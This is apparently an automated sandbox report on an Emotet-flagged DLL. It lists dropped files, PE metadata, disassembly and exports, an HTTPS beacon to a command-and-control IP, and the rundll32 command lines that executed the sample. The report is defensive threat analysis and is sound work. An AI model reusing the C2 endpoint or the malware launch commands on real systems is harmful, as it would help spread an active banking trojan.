                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8300
                          Entropy (8bit):3.69335608268857
                          Encrypted:false
                          SSDEEP:192:Rrl7r3GLNi006c6YrJSUZCgmfL8GSZ+pDV89biusfb2m:RrlsNin6c6YFSUZCgmfLrSnitfz
                          MD5:45B484554E744A5B39F40F9CFA754EEF
                          SHA1:3C7130BDDC84A64FA209B52ADBA5346B264EE96D
                          SHA-256:BA597D1ECA4C78138A47D7797D5059815572533C30DCA96917BAD65B6CE03951
                          SHA-512:E5071F2DCC042469BC5A696EAE73246E2EA25CECA922B9ECE1A96158ABE0DC7090D38AFEEE3F9E4C1F5C4DDC77AE498C0C71BC7290E141A7D67BB6044ED8F762
                          Malicious:false
                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.8.8.<./.P.i.d.>.......
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERE5C7.tmp.xml
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4558
                          Entropy (8bit):4.431257039534109
                          Encrypted:false
                          SSDEEP:48:cvIwSD8zs8JgtWI90CkgwSWSC8Bo8fm8M4J2yGtFg+q84tj1yKcQIcQwQyd:uITf6frgwzSN3JEox1yKkwQyd
                          MD5:8834F0F83F8A79BA6E8F5A04C815DC4C
                          SHA1:2E2BAC63DEBD1E64B97486EDA994F6F2183AB686
                          SHA-256:CC01D1EE6767DF3178982FC44C0322E038A2638E9071D90DE6C80D4F8F98F93B
                          SHA-512:E090841A1192FCA51DC9B7D10BB70DC066F1549FC58BD3046539F71BB7F40458D833AAFC0880D7435BBDEC86CCE0DA0DC8A2E5E893030FCA71778755F0AEA01E
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279265" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                          C:\Windows\appcompat\Programs\Amcache.hve
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1572864
                          Entropy (8bit):4.240892545103475
                          Encrypted:false
                          SSDEEP:12288:EjySJL1r13tcB96tQi9Ot58i3vV1IzQlZyCjP/pH+Mnns0HP:0ySJL1r13tS96tmt3
                          MD5:6645A32F023CD201C9B65B259632ED51
                          SHA1:CF405D0557BC2EBBD413607ADF5C8527F9D2F548
                          SHA-256:687E0E6DB616F1113BDF6BC49594216C2691AC85D9895A144032CCA4A08D222A
                          SHA-512:3CD598BB6161B080F596147EBFE356461BCE90B369987D2169B7324FE3520F846DC603CF462AE8E136843627B3FDFB3717543C682160F9B55F3A8886572508D1
                          Malicious:false
                          C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):3.7278103860465284
                          Encrypted:false
                          SSDEEP:384:nwK5K5Acv4KgnVVeeDze/1NKZtjnT8GRFwXnI:wUKLg/eeDze9NYtjAGRFwX
                          MD5:9C13EE322F620513A3DD4EFA4D7A2BE7
                          SHA1:AF610639D69985357C4555CFB746470BE176FE3C
                          SHA-256:9A13391967B3D52EB8080979E217AF6023059A5F6C5C0F8AE64F4CF22E0C77A8
                          SHA-512:3F55323E578C727284461EC0E0BA49AFCBBBB8DC29417D6AA9D4CE63C935A12C33FFDB5EC4A5D82CA385E56CBBAD99CD29205684DCF05A39CF53265E054EACD2
                          Malicious:false

                          Static File Info

                          General

                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.067319727198819
                          TrID:
                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                          • Generic Win/DOS Executable (2004/3) 0.20%
                          • DOS Executable Generic (2002/1) 0.20%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:IGidwJjoUs.dll
                          File size:372736
                          MD5:daf0060326338fd3d153248ca89b40e5
                          SHA1:b11244a64678d1e8280b7daf273cb0563ee51803
                          SHA256:e9f7e82f30ad5350adb0ad37ac11bc26ae7f3b0879fe33e2a23c97f158c85780
                          SHA512:727ab782457d503480cb9e4991634be013effac466daa6431045bbda9f252f36c74b17ba5f94a4438781f950f3fe5e2076ae1b8cc39e273b3746842dc239d71a
                          SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJyj6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFLORQKqV4epRmxAvAD
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

                          File Icon

                          Icon Hash:74f0e4ecccdce0e4

                          Static PE Info

                          General

                          Entrypoint:0x1001a401
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x10000000
                          Subsystem:windows gui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x61A7100E [Wed Dec 1 06:02:54 2021 UTC]
                          TLS Callbacks:0x1000c500
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:609402ef170a35cc0e660d7d95ac10ce

                          Entrypoint Preview

                          Instruction
                          push ebp
                          mov ebp, esp
                          cmp dword ptr [ebp+0Ch], 01h
                          jne 00007FF3E4E03407h
                          call 00007FF3E4E03798h
                          push dword ptr [ebp+10h]
                          push dword ptr [ebp+0Ch]
                          push dword ptr [ebp+08h]
                          call 00007FF3E4E032B3h
                          add esp, 0Ch
                          pop ebp
                          retn 000Ch
                          push ebp
                          mov ebp, esp
                          push dword ptr [ebp+08h]
                          call 00007FF3E4E03CAEh
                          pop ecx
                          pop ebp
                          ret
                          push ebp
                          mov ebp, esp
                          jmp 00007FF3E4E0340Fh
                          push dword ptr [ebp+08h]
                          call 00007FF3E4E07794h
                          pop ecx
                          test eax, eax
                          je 00007FF3E4E03411h
                          push dword ptr [ebp+08h]
                          call 00007FF3E4E07810h
                          pop ecx
                          test eax, eax
                          je 00007FF3E4E033E8h
                          pop ebp
                          ret
                          cmp dword ptr [ebp+08h], FFFFFFFFh
                          je 00007FF3E4E03D73h
                          jmp 00007FF3E4E03D50h
                          push ebp
                          mov ebp, esp
                          push 00000000h
                          call dword ptr [1002808Ch]
                          push dword ptr [ebp+08h]
                          call dword ptr [10028088h]
                          push C0000409h
                          call dword ptr [10028040h]
                          push eax
                          call dword ptr [10028090h]
                          pop ebp
                          ret
                          push ebp
                          mov ebp, esp
                          sub esp, 00000324h
                          push 00000017h
                          call dword ptr [10028094h]
                          test eax, eax
                          je 00007FF3E4E03407h
                          push 00000002h
                          pop ecx
                          int 29h
                          mov dword ptr [1005AF18h], eax
                          mov dword ptr [1005AF14h], ecx
                          mov dword ptr [1005AF10h], edx
                          mov dword ptr [1005AF0Ch], ebx
                          mov dword ptr [1005AF08h], esi
                          mov dword ptr [1005AF04h], edi
                          mov word ptr [eax], es

                          Data Directories

                          Name                                  Virtual Address  Virtual Size  Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT          0x58390          0x8ac         .rdata
                          IMAGE_DIRECTORY_ENTRY_IMPORT          0x58c3c          0x3c          .rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5d000          0x1bb0        .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG           0x56fdc          0x54          .rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                          IMAGE_DIRECTORY_ENTRY_TLS             0x57100          0x18          .rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x57030          0x40          .rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                          IMAGE_DIRECTORY_ENTRY_IAT             0x28000          0x154         .rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                          Sections

                          Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                          .text   0x1000           0x264f4       0x26600   False     0.546620521173   data       6.29652715831  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata  0x28000          0x313fa       0x31400   False     0.822468868972   data       7.43223852179  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data   0x5a000          0x1844        0xe00     False     0.270647321429   data       2.60881097454  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .pdata  0x5c000          0x66c         0x800     False     0.3583984375     data       2.21689595795  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .reloc  0x5d000          0x1bb0        0x1c00    False     0.784598214286   data       6.62358237634  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Imports

                          DLL           Import
                          KERNEL32.dll  HeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
                          USER32.dll    GetDC, ReleaseDC, GetWindowRect

                          Exports

                          Name               Ordinal  Address
                          Control_RunDLL     1        0x100010a0
                          ajkaibu            2        0x100016c0
                          akyncbgollmj       3        0x10001480
                          alrcidxljxybdggs   4        0x10001860
                          bgmotrriehds       5        0x10001820
                          bojkfvynhhupnooyb  6        0x100019f0
                          bujuoqldqlzaod     7        0x10001800
                          bunsahctogxzts     8        0x100019e0
                          cjogbtafwukesw     9        0x10001830
                          csbbcaopuok        10       0x100016a0
                          cyqrjpaeorjur      11       0x100015f0
                          dlrzuyaeqj         12       0x10001840
                          egiimrq            13       0x10001850
                          evhgyts            14       0x100014f0
                          fdqpjjjyuw         15       0x100017e0
                          finabzjyxhxnnuuv   16       0x10001510
                          fkeacqpbbfw        17       0x10001910
                          fuwsgzf            18       0x10001790
                          fzbmpailk          19       0x10001980
                          gamsrhauvgl        20       0x10001810
                          gjfqgtgk           21       0x10001a10
                          gwsmfxfmekkyr      22       0x100018b0
                          haymuvtatadeydqmk  23       0x10001530
                          hqruohhkvpdalhq    24       0x10001620
                          htdaydfvtjlujwcaj  25       0x10001660
                          hzyrvjtx           26       0x100017c0
                          ifnsupqhxkwj       27       0x10001870
                          ijhgowlpmypocg     28       0x10001720
                          ispjhrqaxnyflnn    29       0x100015a0
                          iszvcqv            30       0x100017a0
                          ixgucop            31       0x100018d0
                          jcdvrhrguqtjpkc    32       0x100016b0
                          jkfyadsdpoks       33       0x100019c0
                          kfzgxmljkwaqy      34       0x10001730
                          kzfvroxozxufciczm  35       0x10001740
                          lpstjqa            36       0x10001900
                          ltkoyvzovzkqemyw   37       0x10001630
                          mdigcwjymnzvgaql   38       0x100014d0
                          mefathlzguuhqodfx  39       0x10001950
                          mgsrmfbja          40       0x10001500
                          mrxhcceopg         41       0x100014a0
                          nafhmuoq           42       0x100018f0
                          nefxgpc            43       0x100018a0
                          nrehxpiznrppeu     44       0x10001690
                          nucocnvjyqp        45       0x100018e0
                          obxoxtcbntaxofr    46       0x10001890
                          ofrzojd            47       0x100016e0
                          oofbctfc           48       0x10001550
                          opzpazspbecyjojf   49       0x100015b0
                          oqoigff            50       0x10001a00
                          oujlzhzvhjh        51       0x100016f0
                          ovpsanbypajv       52       0x100015e0
                          pblpcaadqbdxyb     53       0x10001680
                          ragwdgnyohftj      54       0x100017d0
                          rfosmac            55       0x10001710
                          rgymbuetvifqjqdlo  56       0x10001930
                          rmoxbxbbgidnbds    57       0x10001970
                          rxnkmfbycdcc       58       0x10001560
                          sefltbc            59       0x10001880
                          sgieprcsphl        60       0x100019a0
                          shpcmnqzvyltgdt    61       0x100016d0
                          slktbekupvmdbt     62       0x100015c0
                          sormivnk           63       0x10001570
                          tdblkstlyin        64       0x10001600
                          tkllyrc            65       0x10001650
                          tkwpnvfqnbpbdqe    66       0x10001a20
                          tnhtgnjrabqakgeke  67       0x10001700
                          tzpmcwwig          68       0x10001520
                          uceklmggjof        69       0x10001610
                          ukwdddyj           70       0x10001640
                          uwnaptydgur        71       0x10001940
                          vjusqoeo           72       0x10001580
                          vnyufpq            73       0x10001590
                          vsrwmkhzkrtlexxb   74       0x100014e0
                          wermsdfzb          75       0x10001770
                          wkhpfdjkypy        76       0x100014c0
                          wksndtayhfm        77       0x100015d0
                          wnjvxspilxpchq     78       0x10001670
                          wuqwfssiddrcl      79       0x10001570
                          wyyhtqptznbrknitg  80       0x100017f0
                          wzkcijdvadq        81       0x10001540
                          wzxlvxuyy          82       0x100019b0
                          xhtxeilfgsghxik    83       0x10001780
                          xvdijhconoukll     84       0x100014b0
                          ybbwnezvxfafm      85       0x10001750
                          yeylpreasnzamgac   86       0x100019d0
                          ypkidshxgzkkehc    87       0x100018c0
                          ypzvmpfbgai        88       0x10001760
                          zbrzizodycg        89       0x10001990
                          zdiuqcnzg          90       0x10001920
                          zfkwwtxd           91       0x10001490
                          zktykfwmaehxg      92       0x10001600
                          zmkbqvofdhermov    93       0x10001960
                          zvtqmkitgmzgo      94       0x100017b0

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          Timestamp                           Source Port  Dest Port  Source IP    Dest IP
                          Dec 2, 2021 00:55:59.113495111 CET  49794        443        192.168.2.4  45.63.5.129
                          Dec 2, 2021 00:55:59.113668919 CET  443          49794      45.63.5.129  192.168.2.4
                          Dec 2, 2021 00:55:59.113843918 CET  49794        443        192.168.2.4  45.63.5.129
                          Dec 2, 2021 00:55:59.149615049 CET  49794        443        192.168.2.4  45.63.5.129
                          Dec 2, 2021 00:55:59.149646044 CET  443          49794      45.63.5.129  192.168.2.4
                          Dec 2, 2021 00:55:59.490511894 CET  443          49794      45.63.5.129  192.168.2.4
                          Dec 2, 2021 00:55:59.490653038 CET  49794        443        192.168.2.4  45.63.5.129
                          Dec 2, 2021 00:55:59.780678988 CET  49794        443        192.168.2.4  45.63.5.129
                          Dec 2, 2021 00:55:59.780733109 CET  443          49794      45.63.5.129  192.168.2.4
                          Dec 2, 2021 00:55:59.781363010 CET  443          49794      45.63.5.129  192.168.2.4
                          Dec 2, 2021 00:55:59.783365965 CET  49794        443        192.168.2.4  45.63.5.129
                          Dec 2, 2021 00:55:59.787297010 CET  49794        443        192.168.2.4  45.63.5.129
                          Dec 2, 2021 00:55:59.828861952 CET  443          49794      45.63.5.129  192.168.2.4
                          Dec 2, 2021 00:56:00.323075056 CET  443          49794      45.63.5.129  192.168.2.4
                          Dec 2, 2021 00:56:00.323179960 CET  49794        443        192.168.2.4  45.63.5.129
                          Dec 2, 2021 00:56:00.323218107 CET  443          49794      45.63.5.129  192.168.2.4
                          Dec 2, 2021 00:56:00.323240042 CET  443          49794      45.63.5.129  192.168.2.4
                          Dec 2, 2021 00:56:00.323384047 CET  49794        443        192.168.2.4  45.63.5.129
                          Dec 2, 2021 00:56:00.327590942 CET  49794        443        192.168.2.4  45.63.5.129
                          Dec 2, 2021 00:56:00.327616930 CET  443          49794      45.63.5.129  192.168.2.4

                          DNS Answers

                          Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name                      CName                          Address  Type                    Class
                          Dec 2, 2021 00:52:25.606822968 CET  8.8.8.8    192.168.2.4  0x52b2    No error (0)  a-0019.a.dns.azurefd.net  a-0019.standard.a-msedge.net           CNAME (Canonical name)  IN (0x0001)

                          HTTP Request Dependency Graph

                          • 45.63.5.129

                          HTTPS Proxied Packets

                          Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                          0           192.168.2.4  49794        45.63.5.129     443               C:\Windows\SysWOW64\rundll32.exe
                          Timestamp                kBytes transferred  Direction  Data
                          2021-12-01 23:55:59 UTC  0                   OUT        GET /vIcMmPpXrabVVBXOJgaOKuPeOcCKPXUIh HTTP/1.1
                          Cookie: HR=hcy/hRyH9NLoEyk6a7Uz59hOb7mzlO/wmgmuw+U+8hB3e4M76BBMZiQXdzL+rOvzb1yL3LfyOSim45PynOuCpUIZnQ5cZmHqs7SQt9O7zwz4xkXcg6/oRkU7EE5sPE10xFi1y7VDx9Ov7ygmxpemyuKnLT/gv0JB9m9mcmPDhKiVbEhBpBiGTYaZoGTSg6tFd1fI6MMeVezZeVD7pkX8i8U0SqwAVpQnS4Y1xB1iegh6pXp4tFE7gJs9t6T5v6aI71n7DxNMxlhyB7kHYd2tzisWwB/rDwKlrXgJBvRGWdLzEoTJug==
                          Host: 45.63.5.129
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          2021-12-01 23:56:00 UTC  0                   IN         HTTP/1.1 200 OK
                          Server: nginx
                          Date: Wed, 01 Dec 2021 23:56:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close


                          Code Manipulations

                          Statistics

                          Behavior


                          System Behavior

                          General

                          Start time:00:52:06
                          Start date:02/12/2021
                          Path:C:\Windows\System32\loaddll32.exe
                          Wow64 process (32bit):true
                          Commandline:loaddll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll"
                          Imagebase:0xb40000
                          File size:893440 bytes
                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.939956990.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.939956990.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.958610660.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.958610660.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.958778791.00000000011EB000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.989427479.00000000011EB000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.989393299.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.989393299.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.940009942.00000000011EB000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.956837036.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.956837036.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.939031365.00000000011EB000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.956978658.00000000011EB000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.938967752.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.938967752.0000000001170000.00000040.00000010.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:00:52:07
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1
                          Imagebase:0x11d0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:00:52:07
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,Control_RunDLL
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000003.904116541.00000000006AB000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000003.904116541.00000000006AB000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.914845954.0000000000540000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.914845954.0000000000540000.00000040.00000010.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:00:52:07
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.913568790.0000000001020000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.913568790.0000000001020000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.913622906.00000000010CA000.00000004.00000020.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:00:52:11
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,ajkaibu
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.930364249.00000000003B0000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.930364249.00000000003B0000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.930427759.00000000009EA000.00000004.00000020.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:00:52:15
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,akyncbgollmj
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.939332319.00000000005C0000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.939332319.00000000005C0000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.939371192.000000000095A000.00000004.00000020.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:00:54:02
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:00:54:03
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd",czAZWAgsaZPj
                          Imagebase:0x11d0000
                          File size:61952 bytes
